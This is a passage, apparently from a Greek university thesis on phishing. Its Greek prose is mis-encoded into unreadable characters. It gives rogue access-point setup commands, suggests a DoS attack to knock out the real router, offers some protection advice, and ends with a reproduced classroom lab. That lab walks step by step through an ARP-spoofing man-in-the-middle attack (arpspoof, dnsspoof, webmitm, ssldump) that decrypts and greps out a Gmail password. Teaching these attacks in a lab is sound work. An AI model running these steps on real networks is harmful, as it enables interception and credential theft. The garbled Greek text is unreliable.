  • 18. 17 ifconfig at0 192.168.2.129 netmask 255.255.255.128 route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129 ΢ε απηό ην ζεκείν θάλνπκε restart ην dhcpd /etc/init.d/dhcp3-server restart εθθηλνύκε ην dnsmasq, /etc/init.d/dnsmasq start ηνλ lampp, /opt/lamp/lamp start θαη ζηε ζπλέρεηα ξπζκίδνπκε ηα iptables ώζηε λα δξνκνινγνύλ ηελ θίλεζε πνπ δε καο ελδηαθέξεη λα επεξεάζνπκε από ην router καο ζηελ ζύλδεζε ζην internet. iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain echo 1 > /proc/sys/net/ipv4/ip_forward iptables --table nat --append POSTROUTING --out-interface eth1 -j MASQUERADE Σν eth1 αληηζηνηρεί ζην interface κε ην νπνίν ζπλδέεηαη ν δηθόο καο ππνινγηζηήο ζην internet όπσο είδακε κε ηελ iwconfig. iptables --append FORWARD --in-interface at0 -j ACCEPTifconfig at0 up ifconfig at0 192.168.2.129 netmask 255.255.255.128 Σν access point είλαη έηνηκν λα δερηεί αλππνςίαζηνπο ρξήζηεο.
  • 19. 18 5.3 ΢ελάξηα Υξήζεο Ο πην απιόο ηξόπνο ππνθινπήο δεδνκέλσλ είλαη ε ξύζκηζε θαη εγθαηάζηαζε ηνπ netbook θνληά ζε έλα access point ηνπ νπνίνπ νη ρξήζηεο θάλνπλ ζπνξαδηθή ρξήζε, όπσο ζε κηα θαθεηέξηα. Με ζηόρν λα παξαπιαλεζεί ν ρξήζηεο, ην access point καο ζα έρεη ίδην SSID κε απηό πνπ ζέινπκε λα ππνδπζνύκε. Γηα θαιύηεξα απνηειέζκαηα, κπνξνύκε λα ρξεζηκνπνηήζνπκε κηα θάξηα αζύξκαηνπ δηθηύνπ κε κεγαιύηεξε ηζρύ από απηή ηνπ access point, ώζηε θαη έλαο ππνινγηζηήο λα “πξνηηκήζεη” λα ζπλδεζεί κε εκάο αληί κε ην θαλνληθό access point. Δλαιιαθηηθά κπνξνύκε λα πξνζπαζήζνπκε λα ξίμνπκε ην router είηε αιιάδνληαο ηηο ξπζκίζεηο ηνπ από ην web interface είηε, αλ έρεη δπλαηό password ή δε δίλεηαη πξόζβαζε ζε απηό από αζύξκαηε ζύλδεζε, λα ην “ξίμνπκε” κε DOS attack (επίζεζε ηύπνπ Denial Of Service). 6. Σξόπνη Πξνζηαζίαο Τπάξρνπλ αξθεηέο ηερληθέο θαηαπνιέκεζεο ηνπ phishing, αλάκεζά ηνπο θαη ηερλνινγηθά εξγαιεία, αιιά ε θαιύηεξε αληηκεηώπηζε είλαη ε ελδπλάκσζε ηνπ πην αδύλακνπ θξίθνπ ηεο δηαδηθαζίαο πνπ είλαη ν αλζξώπηλνο παξάγνληαο. Με θαηάιιειε εθπαίδεπζε, νη κε έκπεηξνη ρξήζηεο κπνξνύλ λα αλαγλσξίδνπλ απόπεηξεο phishing, θαη λα κελ πέθηνπλ ζύκαηα ησλ παξαπιαλεηηθώλ κελπκάησλ. ΢ηηο πεξηπηώζεηο πνπ έλα email δείρλεη λα πξνέξρεηαη όλησο από κηα πξαγκαηηθή ππεξεζία πνπ ρξεζηκνπνηνύκε θαη καο πξνηξέπεη ζε θάπνηα ελέξγεηα, όπσο επηθύξσζε ζηνηρείσλ, είλαη πην αζθαιέο λα κε ρξεζηκνπνηήζνπκε θάπνην από ηα links πνπ πεξηέρνληαη ζε απηό, αιιά λα επηζθεθηνύκε ηε ζειίδα πιεθηξνινγώληαο ηε δηεύζπλζε θαη λα δνύκε θαη εθεί ηπρόλ επηζεκάλζεηο. Φπζηθά κε ην ζελάξην επίζεζεο phising πνπ πινπνηήζακε, αθόκε θαη απηή ε κέζνδνο ίζσο λα ήηαλ επηζθαιήο. Η κόλε απνηειεζκαηηθή πξνζηαζία γηα απηνύ ηνπ ηύπνπ ηηο επηζέζεηο, είλαη λα κελ ζπλδεόκαζηε ζε δίθηπα ρσξίο αζθάιεηα ηα νπνία δε γλσξίδνπκε θαη αθόκε θαη αλ ηα γλσξίδνπκε, αλ δελ παξέρνπλ θάπνηα κέζνδν απζεληηθνπνίεζεο. Δπίζεο, όηαλ αληαιιάζνπκε επαίζζεηεο πιεξνθνξίεο, όπσο
  • 20. 19 αξηζκνύο πηζησηηθώλ θαξηώλ θαη θσδηθνύο πξόζβαζεο, βεβαησλόκαζηε όηη ππάξρνπλ ηα θαηάιιεια αλαγλσξηζηηθά αζθαινύο ζύλδεζεο κε ηελ ππεξεζία πνπ καο ελδηαθέξεη (ζπλήζσο εηθνλίδηα ινπθέησλ ζηελ address bar θαη ζηελ θάησ κπάξα ηνπ browser) θαη όηη ην πηζηνπνηεηηθό αζθαιείαο έρεη εθδνζεί από γλσζηή θαη αμηόπηζηε εηαηξεία. Η ρξήζε πξνγξακκάησλ πνπ έρνπλ δεκηνπξγεζεί από ηηο εηαηξείεο παξνρήο ππεξεζηώλ ειεθηξνληθνύ ηαρπδξνκείνπ ή από ηελ εθάζηνηε ηξάπεδα θαη ρξεζηκνπνηνύληαη από θηλεηά (apps), ή ελζσκαηώλνληαη ζε browsers (plugins) είλαη πην αζθαιή θαζώο επηθνηλσλνύλ απεπζείαο κε ηνλ server απζεληηθνπνίεζεο ηνπ παξόρνπ θαη ρξεηάδεηαη κηα ηειείσο δηαθνξεηηθή θηινζνθία θαη πινπνίεζε γηα λα παξεκβιεζεί θάπνηνο θαθόβνπινο ζε απηή ηε δηαδηθαζία. 7. Παξάξηεκα Δπίζεζε Σύπνπ Man-in-the-Middle κε Ubuntu Linux ΢ην City College of San Francisco αλαηέζεθε ζηνπο ζπνπδαζηέο κηα εξγαζία κε αλαιπηηθέο νδεγίεο γηα ηελ πξαγκαηνπνίεζε επίζεζεο ζε θάπνην κεράλεκα ζην δίθηπό ηνπο, ώζηε λα ππνθιέςνπλ έλαλ θσδηθό gmail. Η πινπνίεζε είλαη παξόκνηα κε απηή πνπ ρξεζηκνπνηείηαη ζηελ παξνύζα πηπρηαθή, αιιά θάπνηα από ηα παθέηα πνπ ρξεζηκνπνηνύληαη γηα ηελ πινπνίεζή ηεο δελ ππνζηεξίδνληαη πηα ώζηε λα γίλεη πξαθηηθή ζύγθξηζε κεηαμύ ησλ δύν κεζόδσλ.
  • 21. 20 What You Will Need  An Ubuntu Linux computer with to use as the "Ubuntu Hacker Computer" (physical or virtual)  A "Gateway" to the Internet, such as a router  A "Victim Computer" running Windows, Linux, OS X, or any operating system that can use a Web browser. If the Ubuntu machine is a virtual machine, the host Windows XP system makes a handy victim. Finding the IP and MAC Addresses of the Victim Computer 1. You can use any machine for the victim computer, such as your Windows XP host machine. Click Start, "All Programs", Accessories, "Command Prompt" to a Command Prompt window on the victim computer. Type in this command, and press the Enter key: IPCONFIG 2. Find the "IP Address", as shown below on this page. If you have several network adapters, as we do in S214, there will be several sets of addresses shown. In S214, find the adapter with an IP address starting with 192.168.1. It's usually the Intel adapter, but not always. 3. Write the IP Address you just found, and the Default Gateway, in the box to the right on this page. Starting the Ubuntu Hacker Computer 4. Start your Ubuntu Linux virtual machine and log in as usual. Installing the Required Packages on to the Ubuntu Hacker Computer 5. From the Ubuntu desktop, click Applications, Accessories, Terminal. In the terminal window, enter this command, then press the Enter key: sudo apt-get install dsniff Enter your password when you are prompted to. Press Y twice when you are prompted to. Wait until the messages stop, and you see the $ prompt. 6. In the terminal window, enter this command, then press the Enter key: sudo apt-get install fragrouter Warning: Only do this on networks you own. Cracking into networks without permission is a crime—don’t do it! Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : S214 IP Address. . . . . . . . . . . . : 192.168.1.28 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.1.1 IP of Victim: ___192.168.1…._____________ IP of Gateway: ___192.168.1.254_____________
  • 22. 21 Press Y when you are prompted to. Wait until the messages stop, and you see the $ prompt. 7. In the terminal window, enter this command, then press the Enter key: sudo apt-get install ssldump Wait until the messages stop, and you see the $ prompt. Using arpspoof to Redirect Network Traffic to the Ubuntu Hacker Computer 8. On the Ubuntu Hacker Computer, in the Terminal window,type in this command and press the Enter key : sudo arpspoof -t IP-of-Victim IP-of-Gateway Replace IP-of-Victim and IP-of-Gateway with the corresponding IP addresses you wrote on the first page of these instructions. Note that the IP addresses in the figure below are from my home network and not correct for S214. This command sends out ARP replies to the victim saying that the Gateway- IP is at the Hacker-Machine's MAC address. The victim's machine will just believe the ARP replies, so it will send all further Internet traffic to the Hacker Machine instead of the real Gateway. Leave this window open. Using fragrouter to Perform IP Forwarding on the Ubuntu Hacker Computer 9. From the Ubuntu desktop, click Applications, Accessories, Terminal. In the Terminal window, type in this command and press the Enter key : sudo fragrouter -B1 Enter your password when you are prompted to. The response is "fragrouter: base-1: normal IP forwarding". This command starts IP Forwarding, so the Hacker Computer will forward the packets it intercepts to their correct destination. That way the Victim will not know anything is wrong. Leave this window open. Using dnsspoof to Redirect all URLs to the Ubuntu Hacker Computer 10. From the Ubuntu desktop, click Applications, Accessories, Terminal. In the Terminal window, type in this command and press the Enter key : sudo dnsspoof
  • 23. 22 Enter your password when you are prompted to. The response is "dnsspoof: listening on eth0 [udp port 53 and not HackerIP]". This command starts a DNS server on the Hacker Computer which replies to all DNS requests with the hacker computers's IP address. The result is that all Internet traffic to all URLs will be sent to the Hacker Computer. Leave this window open. Using webmitm to Send and Receive Certificates 11. From the Ubuntu desktop, click Applications, Accessories, Terminal. In the Terminal window, type in this command and press the Enter key : sudo webmitm Enter your password when you are prompted to. This command sends X.509 Certificates to the Victim, and receives them from the Gateway. The certificates are real certificates, but they won't be verified by a Certificate Authority. This is the only way the Victim can tell they are being deceived. 12. You now have to answer a series of questions to determine what information will appear on your digital certificates: a. At the "Country Name (2 letter code) [AU]:" prompt, type "US" and press the Enter key. b. At the "State or Province Name (full name) [Some-State]:" prompt, type "CA" and press the Enter key. c. At the "Locality Name (eg, city) []:" prompt, type "San Francisco" and press the Enter key. d. At the "Organization Name (eg, company) [Intenet Widgits Pty Ltd]:" prompt, type "CCSF" and press the Enter key. e. At the "Organizational Unit Name (eg, section) []:" prompt, type "CNIT 123" and press the Enter key. f. At the "Common Name (eg, YOUR name) []:" prompt, type in "Student" and press the Enter key. g. At the "Email Address []:" prompt, type in "sbowne@ccsf.edu" and press the Enter key. h. At the "A challenge password []:" prompt, press the Enter key. i. At the "An optional company name []:" prompt, press the Enter key.
  • 24. 23 Checking the Four Windows 13. On the Hacker Computer, you should now have four windows open as shown below: a. A windows with arpspoof redirecting traffic to the "Hacker Computer" b. A window with fragrouter forwarding traffic c. A window with dnsspoof redirecting Web traffic to the "Hacker Computer" d. A window running webmitm to send and receive digital certificates arpspoof fragrouter dnsspoof webmitm
  • 25. 24 Opening the Gmail Login Page on the Victim Machine 14. On the Windows XP Victim Machine, open Internet Explorer and go to gmail.com. You should see the Security Warning shown below on this page. (If you have IE version 6, the message looks different.) This is your warning that the security certificate is not genuine. 15. Click "Continue to this website (not recommended)". 16. An "Information Bar" box pops up, as shown to the right on this page. Click the Close button. 17. Find the yellow "Information Bar" at the top of the browser window, which displays the message "To help protect your security, Internet Explorer has blocked this website from displaying content with security certificate errors. Click here for options…". Click the Information Bar and click "Display blocked content".
  • 26. 25 18. When you get to the Gmail login page, don't log in with your real Gmail account! The passwords could be stolen by anyone doing this project. Instead, enter the username and password shown below, but don't click the login button yet! Username: cnit.123open Password: 1337h4x0r Starting Wireshark to Record the Intercepted Traffic 19. On the Ubuntu Hacker Computer, from the Ubuntu menu bar, click Applications, Internet, "Wireshark (as root)". Enter your password when you are prompted to. 20. From the Wireshark menu bar, click Capture, Interfaces. 21. Find the line with your "Hacker Computer's" IP address in it, and click that Capture button. You should see the number of packets captured increasing. Opening the Gmail Login Page on the Victim Machine 22. On the Windows XP Victim Machine, in the Internet Explorer window, click the Log In button. This will send your username and password to Gmail. The man-in- the-middle attack is not perfect, so the login process will not complete—Internet Explorer will just hang. However, it goes far enough to send your password to the hacker. Decrypting the Captured Traffic on the Hacker Computer 23. On the "Hacker Computer", in the "Wireshark Capture" box, click Stop. Click File, Save. Type in a file name of "gmail" and click the Save button. 24. From the Ubuntu desktop, click Applications, Accessories, Terminal. In the Terminal window, type in this command and press the Enter key : sudo ssldump -r /root/gmail -k webmitm.crt -d > gmail-clear This command uses the digital certificate's key to decrypt the captured traffic, and puts the cleartext in the file gmail-clear in your home directory. 25. In the Terminal window, type in this command and press the Enter key : cat gmail-clear | grep Pass This command displays the lines in the gmail-clear file that contain "Pass". You should see the user name and password in cleartext, as indicated in the figure below.
  • 27. 26 Saving the Screen Image 26. Click outside the virtual machine to make its title bar dim. Press the PrntScn key to copy whole screen to the clipboard in the host Windows XP machine. Open Paint and paste in the image. Save it as a JPEG, with the filename Your Name Proj 25. Stopping the Attack and Returning to Normal Networking 27. On the Ubuntu machine, close all windows and shut down the system. 28. On the host Windows XP machine, close all windows and restart the system. Turning in your Project 29. Email the JPEG image to me as an attachment. Send the message to cnit.123@gmail.com with a subject line of Proj 25 From Your Name. Send a Cc to yourself.
  • 28. 27 Βηβιηνγξαθία Tan, Koon. “Phishing and Spamming via IM (SPIM)”. Internet Storm Center, Γεθέκβξηνο 2006. Mutton, Paul. “Phising Web Site Methods” FraudWatch International, Γεθέκβξηνο 2006. Jøsang, Audun et al.. “Security Usability Principles for Vulnerability Analysis and Risk Assessment.”, 2007. Financial Cryptography, “GP4.3 - Growth and Fraud – Case #3 – Phishing”, Γεθέκβξηνο 2005. The New York Times, “Virtual Goods Start Bringing Real Paydays”, Ννέκβξηνο 2009. “A Day With Tape” blog, Οθηώβξηνο 2009 Wikipedia, “Phising”.